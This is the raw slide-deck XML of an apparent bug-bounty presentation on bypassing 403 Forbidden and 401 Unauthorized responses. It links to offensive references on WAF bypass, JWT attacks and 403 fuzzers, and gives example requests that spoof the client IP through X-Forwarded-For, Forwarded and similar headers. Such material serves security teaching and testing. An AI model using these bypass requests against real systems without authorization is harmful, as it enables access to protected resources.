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5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Lato"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId78"/>
      <p:italic r:id="rId79"/>
      <p:boldItalic r:id="rId80"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Source Code Pro"/>
      <p:regular r:id="rId81"/>
      <p:bold r:id="rId82"/>
      <p:italic r:id="rId83"/>
      <p:boldItalic r:id="rId84"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black"/>
      <p:regular r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Oswald"/>
      <p:regular r:id="rId86"/>
      <p:bold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SourceCodePro-boldItalic.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-italic.fntdata"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide36.xml"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-regular.fntdata"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide35.xml"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular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87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Oswald-bold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Lato-boldItalic.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-bold.fntdata"/><Relationship Id="rId81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Lato-regular.fntdata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Lato-italic.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide28.xml"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato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2a807bd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2a807bd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a033623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a033623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a033623e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a033623e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2bbd79c1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2bbd79c1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2bbd79c1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2bbd79c1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2bbd79b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2bbd79b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2bbd79b3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2bbd79b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a028def2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aa028def2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344e2d58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344e2d58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a028def2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a028def2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e071240a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e071240a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344e2d58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344e2d58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b344e2d586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b344e2d586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b344e2d586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b344e2d586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41035f6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41035f6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b344e2d586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b344e2d586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b344e2d586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b344e2d58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aa028def2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aa028def2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b344e2d58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b344e2d58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aa033623e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aa033623e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aa028def2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aa028def2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b344e2d586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b344e2d586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344e2d586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344e2d586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b344e2d586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b344e2d58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b344e2d58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b344e2d58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344e2d586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344e2d586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b344e2d58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b344e2d58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b344e2d586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b344e2d58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b344e2d586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b344e2d586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b2bbd79b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b2bbd79b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b344e2d58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b344e2d58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2bbd79c1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2bbd79c1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b344e2d586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b344e2d586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344e2d58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344e2d58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aa028def2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aa028def2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aa028def2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aa028def2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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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b344e2d58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344e2d586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344e2d586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b344e2d58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b344e2d58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b344e2d58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b344e2d58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344e2d586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344e2d586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2bbd79b3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2bbd79b3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aa033623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aa033623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b344e2d58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b344e2d58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aa53227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aa53227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aa5321e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aa5321e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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e139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344e2d586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344e2d586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aa5321e139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aa5321e139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aa5321e139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aa5321e139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aa5321e13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aa5321e13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aa5321e13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aa5321e13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aa5321e139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aa5321e139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aa5321e13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aa5321e1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aa5321e139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aa5321e139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aa5321e13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aa5321e13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b344e2d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b344e2d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aa028def23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aa028def23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344e2d58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344e2d58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b2a807bdfd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b2a807bdf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344e2d586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344e2d586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a028def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a028def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Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/1011767" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kishanchoudhary.com/2fa/bypass.html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s://twitter.com/samwcyo/status/103444016427642880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medium.com/@arbazhussain/bypassing-rate-limit-protection-by-spoofing-originating-ip-ff06adf34157" TargetMode="External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hyperlink" Target="http://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html" TargetMode="External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hyperlink" Target="https://speakerdeck.com/bo0om/at-home-among-strangers?slide=8" TargetMode="External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developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Forwarded" TargetMode="External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hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For" TargetMode="External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s://twitter.com/iam_j0ker/status/1303658167205728256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twitter.com/jae_hak99/status/1292043668375744514" TargetMode="External"/><Relationship Id="rId7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TheKingOfDuck/burpFakeIP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twitter.com/offensivekrish/status/1312970617851797505" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://six2dez.gitbook.io/pentest-book/enumeration/web/header-injections" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External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hyperlink" Target="https://twitter.com/Debian_Hunter/status/1400828226642100225" TargetMode="External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github.com/KathanP19/HowToHunt/blob/master/Status_Code_Bypass/403Bypass.md#protocol-base" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=35" TargetMode="External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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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hyperlink" Target="https://twitter.com/0xLupin/status/1351946239940689922" TargetMode="External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hyperlink" Target="https://twitter.com/intigriti/status/1271065134501371904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26.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External"/><Relationship Id="rId8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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=25" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=33" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/intigriti/status/1222868788070227970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twitter.com/iam_j0ker/status/1303658167205728256" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId8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hyperlink" Target="https://twitter.com/chybeta/status/1186246026023165952" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=25" TargetMode="External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www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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hyperlink" Target="https://twitter.com/iam_j0ker/status/1303658167205728256" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/aroly/status/1088169534685630466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gauravnarwani.com/a-1000-bounty/" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=19" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="http://github.security.telekom.com/2020/05/smuggling-http-headers-through-reverse-proxies.html" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/iam_j0ker/status/1303658167205728256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twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External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www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://twitter.com/nnwakelam/status/1191758687989379073" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/ninetyn1ne_/status/1198824497572466688" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/KathanP19/HowToHunt/blob/master/Status_Code_Bypass/403Bypass.md" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/ssusera0a306/offzone-another-waf-bypas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hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=20" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=28" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/samwcyo/status/1334449778286063621" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=27" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570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twitter.com/pxmme1337/status/1192834638156316672" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://twitter.com/nnwakelam/status/1286529994907213826" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=31" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" TargetMode="External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www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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hyperlink" Target="https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet" TargetMode="External"/><Relationship Id="rId5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hyperlink" Target="https://hackerone.com/reports/991717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hyperlink" Target="https://speakerdeck.com/greendog/reverse-proxies-and-inconsistency?slide=25" TargetMode="External"/><Relationship Id="rId5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intrudir/403fuzzer" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/drsigned/bypass403" TargetMode="External"/><Relationship Id="rId5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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/intigriti/status/1227956931454783489" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/JSON%20Web%20Token/README.md#jwt-signature---none-algorithm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35.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://archives.pass-the-salt.org/Pass%20the%20SALT/2019/slides/PTS2019-09-JWAT.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId12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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://archives.pass-the-salt.org/Pass%20the%20SALT/2019/slides/PTS2019-09-JWAT.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=VA1g7YV8HkI" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://deepsec.net/docs/Slides/2016/Go_Hack_Yourself..._Frans_Rosen.pdf" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.nccgroup.com/2020/07/07/an-offensive-guide-to-the-authorization-code-grant/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://i.blackhat.com/asia-19/Fri-March-29/bh-asia-Wang-Make-Redirection-Evil-Again.pdf" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/kunalp94/status/1195321932612169728" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://elmahdi.tistory.com/4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5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/JSON%20Web%20Token/README.md#jwt-signature---rs256-to-hs256" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://archives.pass-the-salt.org/Pass%20the%20SALT/2019/slides/PTS2019-09-JWAT.pdf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github.com/ticarpi/jwt_tool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37.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/JSON%20Web%20Token/README.md#jwt-tool" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://archives.pass-the-salt.org/Pass%20the%20SALT/2019/slides/PTS2019-09-JWAT.pdf" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://notsosecure.com/crafting-way-json-web-tokens/" TargetMode="External"/><Relationship Id="rId12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github.com/Bo0oM/WAF-bypass-Cheat-Sheet" TargetMode="External"/><Relationship Id="rId5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github.com/brendan-rius/c-jwt-cracker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archives.pass-the-salt.org/Pass%20the%20SALT/2019/slides/PTS2019-09-JWAT.pdf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/swlh/hacking-json-web-tokens-jwts-9122efe91e4a" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/JSON%20Web%20Token/README.md#jwt-cracker" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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1.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/opexxx/status/1310734025821237249" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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github.com/lc/gau" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/tomnomnom/waybackurls" TargetMode="External"/><Relationship Id="rId5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github.com/search" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/gwen001/github-search/blob/master/github-endpoints.py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twitter.com/ShawarkOFFICIAL/status/1147009442749304832" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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www.google.com/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twitter.com/ShawarkOFFICIAL/status/1147009442749304832" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/BurpSuite-ParamMiner/lowercase-headers" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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0.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1242094464182738944" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/m4ll0k/status/1294983599943540738" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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2.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/125470123936072090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github.com/Bo0oM/WAF-bypass-Cheat-Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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www.slideshare.net/ssusera0a306/offzone-another-waf-bypass" TargetMode="External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www.youtube.com/watch?v=j2RrmNxJZ5c&amp;t=1106s" TargetMode="External"/><Relationship Id="rId9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hyperlink" Target="https://twitter.com/iam_j0ker/status/1303658167205728256" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/h4x0r_dz/status/1317218511937261570" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accoun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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4678175" y="1915350"/>
            <a:ext cx="3980400" cy="149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72B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>HTTP/1.1 403 Forbidden OR 401 Unauthorized</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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72B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content-Length: Number</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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72B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Content-Type: text/html; charset=UTF-8</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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72B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;h1&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="36B37E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>You D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="36B37E"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>on’t Have Permission To Access </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="172B4D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="EFEFEF"/>
                </a:highlight>
              </a:rPr>
              <a:t>&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="12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3868050" y="339175"/>
            <a:ext cx="53502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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="48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Authorization</a:t>
            </a:r>
            <a:b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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="48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Response</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="48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4" name="Google Shape;204;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4028100" y="2926150"/>
            <a:ext cx="50301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3000">
                <a:solidFill>
                  <a:srgbClr val="42424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 sz="3000">
                <a:latin typeface="Lato"/>
                <a:ea typeface="Lato"/>
                <a:cs typeface="Lato"/>
                <a:sym typeface="Lato"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"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 sz="3000"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/>
              </a:rPr>
              <a:t>@0xAwali</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="30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5" name="Google Shape;20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X-Forwarded-For Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. X-Forwarded-For: 127.0.0.1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X-Forwarded-For: IP:Port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X-Forwarded-For: IP-Of-Company </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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13" name="Google Shape;313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GET</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /authorization-response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User-Agent: Mozilla/5.0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X-Forwarded-For: 127.0.0.1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Referer: https://previous.com/path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14" name="Google Shape;314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5" name="Google Shape;315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17" name="Google Shape;3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20" name="Google Shape;320;p49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1" name="Google Shape;321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3" name="Google Shape;323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X-Forwarded-For Header Twice </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. X-Forwarded-For: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X-Forwarded-For: 127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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29" name="Google Shape;329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GET /authorization-response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User-Agent: Mozilla/5.0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X-Forwarded-For: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X-Forwarded-For: 127.0.0.1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Referer: https://previous.com/path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1" name="Google Shape;331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33" name="Google Shape;3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X_Forwarded_For Header Instead Of  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-Forwarded-For e.g. X_Forwarded_For: 127.0.0.1 </a:t>
            </a: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sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="341" name="Google Shape;341;p5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GET /authorization-response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User-Agent: Mozilla/5.0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X_Forwarded_For: 127.0.0.1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Referer: https://previous.com/path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42" name="Google Shape;342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3" name="Google Shape;343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45" name="Google Shape;34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7" name="Google Shape;34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X-Forwarded-For Header</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e.g. X-Forwarded-For: 127.0.0.1\r </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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Bypass 403 Forbidden</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Google Shape;353;p5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GET /authorization-response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User-Agent: Mozilla/5.0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X-Forwarded-For: 127.0.0.1\r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Referer: https://previous.com/path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54" name="Google Shape;354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5" name="Google Shape;355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57" name="Google Shape;35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359" name="Google Shape;35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Forwarded Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. Forwarded: for=127.0.0.1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Forwarded: for=IPv4;proto=http;by=IPv4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Forwarded: for="[</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]:Port" </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Bypass It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65" name="Google Shape;365;p5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GET /authorization-response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User-Agent: Mozilla/5.0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Forwarded: for=127.0.0.1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Referer: https://previous.com/path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66" name="Google Shape;366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7" name="Google Shape;367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69" name="Google Shape;36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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255350" y="2621200"/>
            <a:ext cx="31284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1" name="Google Shape;37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425" y="2621200"/>
            <a:ext cx="510175" cy="4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EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>X-ProxyUser-Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Header </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g. </a:t>
